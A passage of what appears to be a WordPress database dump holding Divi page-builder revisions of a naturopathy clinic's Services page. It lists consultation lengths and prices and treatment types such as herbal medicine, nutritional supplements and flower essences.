body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>\n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.\n\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]\n<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 20:05:15','2025-04-01 12:05:15','',424,'https://verdenaturopathy.com.au/?p=433',0,'revision','',0),(432,1,'2025-04-01 20:03:02','2025-04-01 12:03:02','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>\n\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>\n\n \n\n \n\n \n\n \n\n \n\n \n\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.\n\n [/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 20:03:02','2025-04-01 12:03:02','',424,'https://verdenaturopathy.com.au/?p=432',0,'revision','',0),(425,1,'2025-04-01 19:58:59','2025-04-01 11:55:09',' ','','','publish','closed','closed','','425','','','2025-04-01 19:58:59','2025-04-01 11:58:59','',0,'https://verdenaturopathy.com.au/2025/04/01/425/',3,'nav_menu_item','',0),(426,1,'2025-04-01 19:55:09','2025-04-01 11:55:09','<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Consultations</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Choose from face-to-face or online consults</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>[/et_pb_text][/et_pb_column][/et_pb_row]</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>\n\n \n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" 